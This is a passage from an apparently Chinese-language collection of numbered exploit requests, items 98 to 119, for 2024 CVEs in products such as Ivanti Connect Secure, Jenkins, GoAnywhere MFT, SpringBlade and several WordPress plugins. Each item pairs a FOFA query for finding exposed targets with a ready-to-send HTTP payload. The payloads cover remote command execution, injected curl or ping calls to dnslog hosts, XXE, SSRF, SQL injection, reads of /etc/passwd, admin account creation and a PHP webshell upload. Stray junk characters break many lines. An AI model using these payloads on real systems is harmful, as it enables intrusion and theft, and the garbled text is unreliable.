; _% J/ b+ l, _) |- VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 D! E" ]( `* O! _/ N* EAccept-Encoding: gzip
, V0 X3 g& R) j- b+ D7 C2 aConnection: close
2 J2 c& h9 X$ s& H) XCookie: rememberMe=PAYLOAD/ A& ^* v7 w$ s0 d. Q
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
/ _4 [; A  W  q- j& D) ]
- x& H9 |4 ^, j3 z8 W) |. {- K4 ]# P6 s* P- V6 d1 G4 T. q; ~' x
98. SpiderFlow爬虫平台远程命令执行
& L: K& [6 s7 `. t, ~% BCVE-2024-0195. J  A% k9 F4 G6 m, H/ g. r- n0 I7 w
FOFA:app="SpiderFlow"9 i" d* T  _0 K
POST /function/save HTTP/1.1$ r- v! c7 J- o6 A+ m
Host: 192.168.40.130:8088
4 R* @. I( t7 }$ Y) C! }" _) |& fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: u& ]0 y. G8 A9 x( j
Connection: close
; G. t/ k  [0 \* [0 fContent-Length: 121' w+ F. c4 w9 s) x$ x/ E
Accept: */*4 K9 b8 ?$ V# S' I# M/ p( F
Accept-Encoding: gzip, deflate
& |( e! }7 s! h) y6 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 t6 M- c/ V" J  ]. q  L
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
% p+ B& t) @# Y6 TX-Requested-With: XMLHttpRequest
, c% F8 c* g( {& \; a
7 y" s0 k$ v& w7 Did=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
* c/ B. D  N  K3 m' p: K( _( t+ p( [$ x5 Q

, T) R& T3 r# |6 J, N! L99. Ncast盈可视高清智能录播系统busiFacade RCE
1 G$ |8 B# u3 bCVE-2024-03055 `+ M! b, G) A7 d- b5 T
FOFA:app="Ncast-产品" && title=="高清智能录播系统"  ~1 f! v( [' i1 m) ^4 ~/ F) O4 U
POST /classes/common/busiFacade.php HTTP/1.13 t6 F5 P! @3 C" v8 \7 M0 ~8 ]1 x
Host: 192.168.40.130:8080
* S5 ?! \  f% P' |% xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; J( k% B6 N$ [  w& I& p9 R* i
Connection: close9 f2 y3 m$ B1 o- ?/ d
Content-Length: 154
7 N# J8 F: e) O$ E% _Accept: */*
/ a; Q3 ~' N' u  VAccept-Encoding: gzip, deflate
4 W. E4 I5 x+ u0 a3 |  ^. b4 e( xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 Y- L0 a( t, z+ W: M5 U* MContent-Type: application/x-www-form-urlencoded; charset=UTF-8
2 U" P! n' \2 MX-Requested-With: XMLHttpRequest
, }) s- W! K. r* B7 a5 D+ W+ x
9 d4 H. F2 c7 X  Y  Q& q6 `%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D# r# t# n% u) v  A, o
0 w* D% Q: `, [! E
' U2 k3 E+ S7 C6 J: o) p; x/ T& y
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 h! w0 s0 D& O9 s$ D, A
CVE-2024-0352
: b' w- y, u% A6 ]  F7 y( B  fFOFA:icon_hash="874152924"3 v1 S6 m4 k" K$ ?
POST /api/file/formimage HTTP/1.1
- \7 q3 c) O, \' T- lHost: 192.168.40.1308 w& m! j) ^" M7 x0 C. ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 D9 x- H* r) P+ g. u" S/ n4 r7 ^
Connection: close7 w- a5 C) w" c! A+ {* Z, p
Content-Length: 2013 O0 [2 {, I) v+ @- D$ a% {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei5 n! F, L  d" {; i* A' ^
Accept-Encoding: gzip) s( ^5 S5 X& o+ e
& c8 Y% h! k. e; B
------WebKitFormBoundarygcflwtei1 x! @! u* P% q5 l8 X  [; t) M
Content-Disposition: form-data; name="file";filename="IE4MGP.php"  h" e6 B2 c% o
Content-Type: application/x-php
6 t  R3 |# u: C% Q* v7 I" h6 M/ s' X" ^0 P
2ayyhRXiAsKXL8olvF5s4qqyI2O
$ S/ t( x9 c) g; o0 h% z' R------WebKitFormBoundarygcflwtei--+ U" e1 q# x4 x2 Z; i& b
5 C" {: p+ g& E2 f7 l. c9 }7 q

' W/ a- g* k' p- y# y% x8 x101. ivanti policy secure-22.6命令注入. x9 r! E5 Y, Y# H" S; Z0 l
CVE-2024-21887
( U" W% q3 I, Q; dFOFA:body="welcome.cgi?p=logo"
- Y  m8 K) p' E+ `1 F1 Z5 JGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.14 `/ B. a5 d; @) l
Host: x.x.x.xx.x.x.x/ I& e; j3 ]+ d: s1 W7 Z# ~& t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. V. C$ k& f) S& j8 C$ pConnection: close
( D" {* m3 o4 ^7 c9 Y: U; TAccept-Encoding: gzip- ]2 z% X9 X5 q$ y
  y% ]6 u+ b1 z1 X
- ]9 M- K: ^& r( w% h5 A' \8 I3 d
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行8 |& U7 H( h* M1 F& P
CVE-2024-21893
: Z, ?( ^# q3 UFOFA:body="welcome.cgi?p=logo"' @7 S# b9 D! L2 V. G8 z. C
POST /dana-ws/saml20.ws HTTP/1.1
" Q2 f& B7 k6 N/ D# j$ nHost: x.x.x.x6 H# X. y  @+ c4 v$ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 ^  k& h# d, N: e
Connection: close
0 U8 }6 w) S$ }% X. M1 n8 UContent-Length: 792
# z# N+ _' ?3 `7 a! m0 ~9 ?) G# TAccept-Encoding: gzip9 |# M: Y9 n' R2 E) h: T. \

1 T- i* L6 s) ~2 w/ o) D<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>/ l/ R( Q) m3 J) i
# p& \5 M3 L$ j5 G  p3 Z! O1 `
103. Ivanti Pulse Connect Secure VPN XXE  d: V" N' j$ d: L
CVE-2024-22024
7 e" O1 x7 H4 e$ U2 y) G8 H, \FOFA:body="welcome.cgi?p=logo"
5 [" |  X, L) h( Q( p( A* n5 x' UPOST /dana-na/auth/saml-sso.cgi HTTP/1.1: Y' E* g; p1 E! }1 w
Host: 192.168.40.130:111% b  C4 l; K% S( i6 G5 l# A
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 g! ]) W' d' p9 q! V: I* S" A' L1 G
Connection: close
4 f. p- M! _! r+ x+ \0 E1 _Content-Length: 204
8 s3 V" v+ `' Y2 p# x% B( }Content-Type: application/x-www-form-urlencoded( {% [7 G" Y  }
Accept-Encoding: gzip
2 c6 O# C* N, X2 W; g9 u. |2 I. Q6 D2 E; y! Y
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
$ q9 s* }8 e, H% f8 Q
# j$ `- i, n3 i
8 P$ X" Y' ?* C& N' C+ o其中SAMLRequest的值是xml文件内容的base64值,xml文件如下9 T- n7 J1 Y* V; Q) R
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>0 J' [: t0 Q! g. e( Y

& R0 M/ L2 O. W* n$ D" E# n3 V$ j0 u. l% R' D3 {
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露) ?6 r, y" P+ B, l
CVE-2024-05699 f# E  _( x" I8 D) q1 n1 X+ K: \5 j
FOFA:title="TOTOLINK"# D0 B& j1 m3 ~9 \7 z0 r7 q
POST /cgi-bin/cstecgi.cgi HTTP/1.1
" ~  |  |- J- r7 G' p9 S3 \Host:192.168.0.1- F2 q% @8 @2 f
Content-Length:419 _9 v* v1 D  X: Q! ~* p
Accept:application/json,text/javascript,*/*;q=0.01
8 |- m) F$ Y3 Q) R' B" MX-Requested-with: XMLHttpRequest# V% I4 q$ i6 Y5 [8 r$ \6 p
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
! `8 A0 ^% k. O2 C& yContent-Type: application/x-www-form-urlencoded:charset=UTF-83 g4 X* ?8 Z$ ^5 d
Origin: http://192.168.0.1
4 t6 ?) l$ H) x: }6 U4 p9 l6 lReferer: http://192.168.0.1/advance/index.html?time=1671152380564; |. l6 U9 Q- E9 v
Accept-Encoding:gzip,deflate- ]1 b* w5 s& _  e
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7+ B! P$ u) d8 |: P* Y
Connection:close( ]8 u  Z# o# L7 T, Q9 Y" Z
8 ]  i* N" k* z; s) L6 m' w
{- t) E5 R& H  t
"topicurl":"getSysStatusCfg",7 }6 p' N& |+ P1 I$ W
"token":""+ u5 }: t% F) G  G- D9 O
}* w5 Z. K% M9 p# B

2 u' a6 j6 j6 p& N- m8 S. a105. SpringBlade v3.2.0 export-user SQL 注入/ |; @3 L# M# U: [" S2 _
FOFA:body="https://bladex.vip"
$ F" [% o2 q; b8 s7 rhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=16 p2 L& m) C! k0 s/ u

# }/ V# V+ T$ z. i( p, G106. SpringBlade dict-biz/list SQL 注入
' N  G; y% r8 D/ v. pFOFA:body="Saber 将不能正常工作"
0 O& a* V1 {% \8 |3 u, e) {/ y1 \GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 B3 b+ ?4 i7 H2 p* Y1 Z6 QHost: your-ip8 E" u6 B) x3 G) U8 z: n5 j5 j& S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ y; l! y' {7 j, k% P0 w' ^2 w) mBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
- V1 V. u0 L2 ^: R  T3 dAccept-Encoding: gzip, deflate
9 Q8 X" w, s3 [3 [8 i# nAccept-Language: zh-CN,zh;q=0.9
4 c1 D, {4 q! X9 `Connection: close) L4 S/ D& t3 ~% l$ \$ k0 T
$ p; C! z$ t4 u; P9 s. ]
0 ?# M& n- T+ k. {+ t0 O' B
107. SpringBlade tenant/list SQL 注入+ M5 }7 U# q5 d) T$ V) J  O# C
FOFA:body="https://bladex.vip"
6 _. F$ ?7 m& @" x1 b. jGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
' q. [2 `0 P# R1 x% QHost: your-ip+ J! R- O1 }2 @& T/ s# b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* |1 ]; t& J3 y" i4 `  [+ W" ?Blade-Auth:替换为自己的" @8 M) N8 Y2 w+ }% \
Connection: close
7 Z; Y2 x3 }  v  c) j8 g+ ]6 D( g
& N) s6 c, ]9 d. ]* R6 ^. n! ^- A9 r3 t) M& v
108. D-Tale 3.9.0 SSRF6 g- D+ h" b+ E! Y' |7 R; G8 B
CVE-2024-21642
. J4 Q) ^7 x# cFOFA:"dtale/static/images/favicon.png"
* E" j+ x  x, Q& \# lGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
% n" r$ W; _7 y$ J; |- a2 Y% X0 iHost: your-ip
& [  s/ u( u0 m1 k# ~1 c# c( i4 zAccept: application/json, text/plain, */*
! K0 _8 W8 g) W8 R/ j6 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 M2 y0 g* g5 R! q% ^. o: f# u
Accept-Encoding: gzip, deflate
3 P/ d! i3 o# [+ L" \2 u: [Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% d3 F+ d0 c# X8 [/ }Connection: close
+ h, R" |2 Z' q7 @6 i+ j1 a$ B# p
% L  H8 F2 p4 M% G: N6 k/ o" L1 t! v( K
109. Jenkins CLI 任意文件读取, f9 X; d1 Y1 f+ U: G6 d' _
CVE-2024-23897: x9 q3 D. A% \5 Q
FOFA:header="X-Jenkins"
/ H4 c' C5 A$ n9 u+ X. }POST /cli?remoting=false HTTP/1.1
5 w8 \9 ?9 T/ S& l& }( D) jHost:  N  S) H* x9 B
Content-type: application/octet-stream
! J. q( ^  j/ h# ZSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
: ]4 }- [6 `( _$ ]% m( SSide: upload. s/ S( T( t( K1 [% M" C6 m
Connection: keep-alive8 p+ g' }, N2 ^* J& ^: X
Content-Length: 163
6 q& m; V: y, y$ l- }4 ^( V7 m( d
9 q; B8 x5 N8 x" ]2 p) |b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'( \$ `& j& P  k

6 o7 d8 o/ R0 g/ e
8 }! \+ Q  `3 n7 S2 F' l+ oPOST /cli?remoting=false HTTP/1.1! S" L& n& q/ c* `$ J' f5 Y
Host:
# V" X, ~7 ?! c9 ESession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92  e( c. z1 j( e
download
% M) w; \( i, X# |Content-Type: application/x-www-form-urlencoded$ l9 [! R) V, |; v% B8 @8 w
Content-Length: 0
# h+ B- \- y7 l6 o' i# P1 [: w. Z# r# C

2 Z1 r' q9 j9 w9 l7 T. LERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ Q& o" T3 C$ u+ p9 a* H5 E" h# Ajava -jar jenkins-cli.jar help; ^8 B* |- h& H$ |
[COMMAND]& }( c0 y) |3 N3 ~3 r' F
Lists all the available commands or a detailed description of single command.& x8 W. q2 z" H1 X$ b0 X
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
6 C$ Q5 O9 ?' d0 O# C; i7 z& W( k& M/ O6 W/ z2 m$ G# |3 y
' K, v( s& ]3 K8 [1 l7 u  J; K
110. Goanywhere MFT 未授权创建管理员* I9 u3 X! x9 c# q  A; k( E' [
CVE-2024-0204
6 [9 H& p- _2 g+ ~/ K3 ^& Q9 e3 l  jFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"" L& n0 ]$ M8 L' P  @8 p) r
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.12 T% }. E& {) }! T1 t5 b$ @0 q  O- Q
Host: 192.168.40.130:8000
2 t  o0 t# y! L& N5 kUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
, ?5 p  W; e3 BConnection: close$ {) w, C' m# d1 \9 [- q
Accept: */*
- V9 d2 S: c) V! B  tAccept-Language: en
2 S/ h, w0 O3 P: c7 _+ p- [4 EAccept-Encoding: gzip
, s$ ~4 o7 U( @# S+ J6 d
8 d; ^: f2 \! J2 L
5 _+ P7 Z) B" B$ F  }111. WordPress Plugin HTML5 Video Player SQL注入
2 ]& [0 \) `3 h( {6 X0 ?CVE-2024-1061
" i% X+ ?- E$ Q8 @; nFOFA:"wordpress" && body="html5-video-player"
& x9 q! X' m  j- @; A9 N) qGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
, u; |  J* y0 H* dHost: 192.168.40.130:112& }, F* ]" L0 O0 e0 f' x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
1 |8 ^* B  U! {Connection: close+ h1 Y: U2 r2 q, D" U2 G
Accept: */*
: U" T4 e: l: s2 GAccept-Language: en
$ r0 E7 P* _; S. H6 Q2 u: t  OAccept-Encoding: gzip3 i1 H4 Z* C& B& u* P" l
1 [3 s. g1 g. X2 d  ]2 C

$ [( ^. Z% {4 O& Y% m$ U112. WordPress Plugin NotificationX SQL 注入6 m  O9 @9 V) H- Q
CVE-2024-1698
7 h% q) C; q" M: o$ M0 X1 T9 @FOFA:body="/wp-content/plugins/notificationx"" I' h! I& R& Y. R& V& \
POST /wp-json/notificationx/v1/analytics HTTP/1.1+ Q: f5 B" a  y8 `; c
Host: {{Hostname}}' X6 l( X* I3 `
Content-Type: application/json
1 D& |9 E" U" ~; d' ~$ y/ d
2 J+ s, U6 c- `0 J, w2 c{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}2 h) D9 W0 T% c
0 n5 P* C) f/ }8 Q

& Y2 M! E+ g# D) d113. WordPress Automatic 插件任意文件下载和SSRF
8 `. F4 M2 E  o# aCVE-2024-279541 A: T  ]8 Z! D& H8 P+ S6 @3 z
FOFA:"/wp-content/plugins/wp-automatic", ?, ~8 j) Y0 G$ x% \3 n1 Y: x
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
- \- L9 H3 W( D7 ^3 C) I& P5 MHost: x.x.x.x! e. W: ?* c1 G0 N
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36. G; K' R9 n9 `/ X0 M3 y8 I7 l
Connection: close
0 q. R  L; X. |/ D5 N" F* o2 @5 a6 @Accept: */*' n4 A0 l* b; j% H- G( g
Accept-Language: en( v, L' q) b4 w5 F% b) K
Accept-Encoding: gzip
' [3 z; o4 L' A/ X6 A& o
1 X! K7 o# M: w
- F5 X  h6 r6 S# @+ @114. WordPress MasterStudy LMS插件 SQL注入
6 m1 V& v, X9 \$ H* N+ A' Z  A3 \( ZFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
+ }! H3 b5 W- f8 xGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
! I' c3 I6 V. k1 B' UHost: your-ip& J0 s2 Y; f( S& N5 D
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* @: ?- V2 e9 L& s  x' L* ^# Q# c1 _Accept-Charset: utf-8
. M1 O. n- C; d& C; `) FAccept-Encoding: gzip, deflate3 y) O9 g; ^4 H
Connection: close
1 r( J0 H" I! Y# W, b" I$ N/ E3 w& \  ?, w, P, H$ S3 }

- u6 U/ Q: q4 U7 B115. WordPress Bricks Builder <= 1.9.6 RCE
. u: A: E+ R# q- vCVE-2024-25600  e) L& g, m1 P+ v7 F3 @1 G7 ?
FOFA: body="/wp-content/themes/bricks/"
7 ?5 m, O3 m" I8 T9 i- a. W8 d第一步,获取网站的nonce值
# P0 A9 t4 H( RGET / HTTP/1.1
- p* Y: g' G" _' m! O4 u8 ?Host: x.x.x.x
# M% z$ E% T% ~; R0 x/ [User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 ^; p6 c0 {& R  ?6 y
Connection: close
5 c$ O; d1 ?: D6 xAccept-Encoding: gzip
7 F5 f, V5 W( V6 ]% O  ]+ t# |7 M, b6 {, c/ x3 x

, m& T; @4 i0 Z5 H- J第二步替换nonce值,执行命令
/ ^& ~6 M8 W  l2 B2 u5 MPOST /wp-json/bricks/v1/render_element HTTP/1.14 H9 n- A3 z0 Q$ Y' M
Host: x.x.x.x( H0 B" T0 a0 H# ~* f& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ s1 v$ v- q1 J  y/ u: b7 c; V. S4 H/ k
Connection: close
) H( X" g7 \! d  A5 J* zContent-Length: 3560 T- a  N/ `' {8 A3 B1 d
Content-Type: application/json
5 I+ t) |' h5 U; x$ E& IAccept-Encoding: gzip7 e8 W; F0 o( _9 n" }$ I
6 p5 C! m* i; ]; ^' N+ b9 J- ~- ]3 f
{& r& z/ [0 C/ W
"postId": "1",+ R+ y( B7 F1 X5 D/ o7 D
  "nonce": "第一步获得的值",
$ U7 I: Q6 }$ t  "element": {6 I+ T- `0 h$ @! u, v
    "name": "container",
9 f! R9 [3 Y. A3 W    "settings": {* Y/ }2 x7 n5 g7 Z# F2 {
      "hasLoop": "true",& k2 L! o8 X- h7 B: F$ i
      "query": {
* j" x( o, o9 i" ]+ v        "useQueryEditor": true,5 G# M4 X% y( c6 {' U$ F
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",( k: n& I9 U) T3 L8 w: I
        "objectType": "post") t0 f# O9 c9 n; J) ?' J
      }3 ?' ^: o( d9 O- |7 g
    }
& P( Y" c3 l' i6 t, v2 z9 ^  }
. v* P8 C! U! \2 q: `6 K}
  P; z$ y1 _1 _0 P3 z6 X/ C! W3 L8 d) [+ [
) ^+ I$ c7 r! N5 A" P) ^  ], P
116. wordpress js-support-ticket文件上传" F; u2 y: T( `; E
FOFA:body="wp-content/plugins/js-support-ticket"1 A: j" g/ M3 s! {$ @+ k- Z) _
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1% d* g1 s3 M0 m7 v2 g- D- P4 ~
Host:7 v" ^, T4 j: I6 p2 l
Content-Type: multipart/form-data; boundary=--------7670991718 m9 _5 B8 i5 c$ |. V, y+ h" e
User-Agent: Mozilla/5.03 g9 Q" O' |/ n& I$ Y

) A; B2 Z' W) l3 y8 `----------767099171
$ j; z; a" L+ z, e! l) bContent-Disposition: form-data; name="action"& |$ r. [+ j+ d# i  u& O& l: h& Z
configuration_saveconfiguration
8 K3 `( U- Y2 Y+ D9 K6 u8 }----------767099171
+ C- @  a7 [8 j: {# X) }Content-Disposition: form-data; name="form_request"5 i4 K: B' o2 e" X, |
jssupportticket4 V# a8 \7 H% U4 z4 ~
----------767099171: _) s: \7 ]2 ~$ q% P
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 o4 V6 ^3 V$ W$ j' i9 u
Content-Type: image/png$ `. ~$ [% Q" _: P3 B
----------767099171--
% _$ R/ L: T6 A( J$ P
  A% L2 Q$ @8 }, S  Z5 f# w: f9 ]3 B$ J
117. WordPress LayerSlider插件SQL注入
& H( w) _) u0 D# c" e0 Gversion:7.9.11 – 7.10.0
3 u7 w6 y% q( V2 s3 N) eFOFA:body="/wp-content/plugins/LayerSlider/"8 T: X. D* \, e: q; y: a/ k' ]
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
% [5 d- e0 r' H$ HHost: your-ip
0 ^* F( O4 ~5 \/ C! c9 D' MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% D  m7 E4 s) E" N0 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. D2 y6 I% z( HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& }! @  Z) e  U1 S+ nAccept-Encoding: gzip, deflate, br( P3 T" {; `- N' E) |
Connection: close
1 N1 x# Y0 h8 u% L% UUpgrade-Insecure-Requests: 1
8 q3 \$ @0 {- U& z
' u- i* s4 c+ q+ c+ D7 G
& Z* C6 i0 U1 {7 f. z$ O6 K118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. ^% |8 @) W9 ]& `) ]
CVE-2024-0939: {, T  T; I$ a9 A2 G
FOFA:title="Smart管理平台"
* U( o& `4 c# Q0 f% O# APOST /Tool/uploadfile.php? HTTP/1.1
$ Y0 `$ s: u: W  OHost: 192.168.40.130:8443
) T: Q2 |3 N) G' {3 u( ACookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
5 r  n; v  G  b! k, \8 y& SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' }- s8 l; B' Z/ S; @8 |( S1 G0 |  B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 V6 u. P* W& I9 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ G& t, T6 _6 E3 ]* X0 D. |% M$ [$ xAccept-Encoding: gzip, deflate
; T6 B/ O7 N0 s* c& OContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 i- |2 w+ M0 |' H# UContent-Length: 405
$ u6 }. g6 k& O4 s* v' {Origin: https://192.168.40.130:8443. G5 G- h7 m$ Y; G+ l+ e
Referer: https://192.168.40.130:8443/Tool/uploadfile.php- R. L. F2 O# |! M/ s  F
Upgrade-Insecure-Requests: 1" T! a0 @' @3 u3 B8 L. D# G' i: |
Sec-Fetch-Dest: document3 k2 [8 s( A  g
Sec-Fetch-Mode: navigate
9 g& w& o4 c* f7 `0 F* JSec-Fetch-Site: same-origin. X$ O' t" W& i
Sec-Fetch-User: ?1
! _1 I8 v7 n$ l$ uTe: trailers
- u( K3 p  U9 u. T7 [- WConnection: close
) F' q$ C2 _  ^5 e$ j
: a" ?5 N6 }2 T! K-----------------------------13979701222747646634037182887
* n$ H( w7 f) `# f: wContent-Disposition: form-data; name="file_upload"; filename="contents.php"9 w7 F" q" ?$ j: r3 q/ B# q/ S
Content-Type: application/octet-stream
( v. n2 j% @# T# X- r7 a' y% \5 J" w, {/ a! r# ?
<?php, v! f& o) ]- s- p5 e2 r
system($_POST["passwd"]);. l/ A8 G2 a% S! a8 L' G8 O( f: s
?>
7 V" A( D7 j: d: o- K6 H2 T-----------------------------139797012227476466340371828879 l: `9 W! z7 \+ K0 b
Content-Disposition: form-data; name="txt_path"3 ]6 F5 b& S+ K
8 T$ D$ `) _3 M0 Y/ q2 z
/home/src.php
2 d  e* \* p( u* ]$ P-----------------------------13979701222747646634037182887--
% M6 V8 h: ^& }; z. @& B  W) t' W" i/ t2 q

) w) E, H/ T! Z: f6 Q* d* F% K- ^/ B访问/home/src.php
% ~+ w+ \* g/ P3 {% K& y
1 w# z! p" Z, o119. 北京百绰智能S20后台sysmanageajax.php sql注入) @: E/ O2 ?* X4 q* W! ]
